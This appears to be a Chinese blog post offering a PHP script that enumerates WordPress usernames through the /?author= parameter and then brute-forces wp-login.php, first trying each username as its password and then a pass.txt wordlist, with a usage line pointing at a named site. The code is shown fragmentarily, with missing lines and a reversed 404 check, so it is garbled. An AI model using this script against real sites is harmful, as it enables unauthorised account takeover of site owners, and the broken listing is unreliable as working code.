我认为,在某些情况下,渗透测试者遇到的是最新版本且未安装任何插件的 WordPress,此时我们可以利用一些暴力的方法来进行渗透。
事实上,我们先通过 /?author= 列举用户名,然后尝试猜测用户名与密码相同的账户。如果不成功,则可以通过目录下的 pass.txt 继续暴力破解来得到结果。这个脚本默认枚举了 10 个用户,可自行修改。
Usage:
php wordpress.php http://www.chncto.com
for ($i=1; $i <= 10; $i++) { |
$url = $domain."/?author=".$i; |
$response = httprequest($url,0); |
if ($response == 404) { |
$pattern = "/author\/(.*)\/feed/"; |
preg_match($pattern, $response, $name); |
$namearray[] = $name[1]; |
echo "totally got".count($namearray)."users\n"; |
echo "attempting same username&password:\n"; |
$crackname = crackpassword($namearray,"same"); |
$passwords = file("pass.txt"); |
echo "attempting weak password:\n"; |
$namearray = array_diff($namearray,$crackname); |
crackpassword($namearray,$passwords); |
function crackpassword($namearray,$passwords){ |
foreach ($namearray as $name) { |
$url = $domain."/wp-login.php"; |
if ($passwords == "same") { |
$post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; |
$pos = strpos(httprequest($url,$post),'div id="login_error"'); |
echo "$name $name"."\n"; |
foreach ($passwords as $pass) { |
$post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; |
$pos = strpos(httprequest($url,$post),'div id="login_error"'); |
echo "$name $pass"."\n"; |
function httprequest($url,$post){ |
curl_setopt($ch, CURLOPT_URL, "$url"); |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); |
curl_setopt($ch, CURLOPT_POST, 1); |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); |
$output = curl_exec($ch); |
$httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE); |
if ($httpcode == 404) { |